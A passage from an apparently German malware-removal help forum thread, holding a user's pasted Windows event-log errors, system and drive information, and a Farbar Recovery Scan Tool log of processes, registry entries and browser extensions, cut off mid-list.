Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 09:56:46 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1". Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (09/28/2015 07:34:23 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. 
Error: (09/28/2015 07:34:20 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 07:34:17 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. 
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 06:13:43 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 06:13:13 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. 
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Systemfehler: ============= Error: (09/29/2015 09:44:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/29/2015 09:44:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Windows Modules Installer" wurde aufgrund folgenden Fehlers nicht gestartet: %%1069 Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7038) (User: ) Description: Der Dienst "TrustedInstaller" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: %%50 Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC). Error: (09/29/2015 09:41:27 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056 Error: (09/29/2015 09:41:26 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. 
Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "CyberGhost 5 Client Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Apple Mobile Device" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/29/2015 09:40:56 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. CodeIntegrity: =================================== Date: 2015-09-21 18:26:06.410 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-21 18:26:06.394 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
==================== Speicherinformationen ===========================

Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+
Prozentuale Nutzung des RAM: 77%
Installierter physikalischer RAM: 4094.49 MB
Verfügbarer physikalischer RAM: 919.03 MB
Summe virtueller Speicher: 8187.18 MB
Verfügbarer virtueller Speicher: 5142.03 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:186.31 GB) (Free:75.85 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:482.62 GB) NTFS
Drive e: (OFFICE12) (CDROM) (Total:0.56 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D)
Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C)
Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================ |
29.09.2015, 14:16 | #15 |
| Malware-gen, Adware-gen ... etc. FRST Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015 durchgeführt von Kenny G (Administrator) auf KENNYG-PC (29-09-2015 09:47:21) Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 8 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe (Apple Inc.) 
C:\Program Files\Bonjour\mDNSResponder.exe (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe () C:\Windows\SysWOW64\PnkBstrA.exe (CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Microsoft Corporation) C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe (Microsoft Corporation) C:\Windows\System32\taskmgr.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.) 
HKLM-x32\...\Run: [GrooveMonitor] => D:\Wuala\microsoft office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-09-23] (Microsoft Corporation) SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> 
{56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> D:\Wuala\microsoft office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> 
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - D:\Wuala\microsoft office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files 
(x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) 
FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08] FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22] FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com Chrome: ======= CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/" CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16] CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16] CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16] CHR Extension: (Gmail) - C:\Users\Kenny 
G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15] CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2 CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03] CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03] CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03] CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27] CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03] CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18] CHR 
